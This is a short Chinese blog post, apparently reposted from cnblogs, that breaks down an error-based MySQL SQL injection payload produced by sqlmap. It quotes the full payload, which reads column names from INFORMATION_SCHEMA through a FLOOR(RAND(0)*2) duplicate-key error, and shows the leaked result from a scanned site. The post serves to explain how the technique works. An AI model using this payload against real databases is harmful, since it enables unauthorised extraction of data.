今天用sqlmap掃一個(gè)網(wǎng)站，想得到一個(gè)表的所有列名，注意到sqlmap用到的一個(gè)error-based payload的:

?

1 AND (SELECT 3174 FROM(SELECT COUNT(*),CONCAT(0x71666f7771,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x73797374656d AND table_schema=0x68646d303334303337335f6462 LIMIT 0,1),0x7165767371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

?

sqlmap通過這句話最終得到了一個(gè)叫“system”的表的一個(gè)叫“id”的列的列名（也就是“id”:）

好奇這個(gè)sql語句是怎么實(shí)現(xiàn)這個(gè)功能的。

第一眼看到這個(gè)sql語句真心是一頭霧水，在vim里面展開，并在目標(biāo)機(jī)器上跑了一下，發(fā)現(xiàn)會報(bào)一個(gè)

錯(cuò)誤：Duplicate entry 'qfowqidqevsq1' for key 'group_key' (1062)

這個(gè)錯(cuò)誤的entry就包含著要得到的列名“id”，原來這就是傳說中error-based的意思，就是通過讓目標(biāo)機(jī)器的mysql server報(bào)錯(cuò)，來獲取對應(yīng)的信息。

通過分析，造成這個(gè)錯(cuò)誤的原因主要在于那個(gè)concat()最后的floor(rand(0)*2),這個(gè)東西每次隨即產(chǎn)生的值不同會導(dǎo)致group by的key不唯一，所以就報(bào)錯(cuò)了。真心是妙招。

?

隨便google了一下，找到這么一個(gè)網(wǎng)頁，有一些專門相關(guān)的介紹

http://zentrixplus.net/blog/sql-injection-error-based-double-query/

轉(zhuǎn)載于:https://www.cnblogs.com/flyFreeZn/p/3421510.html

總結(jié)

以上是生活随笔為你收集整理的关于mysql的error-based injection payload的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。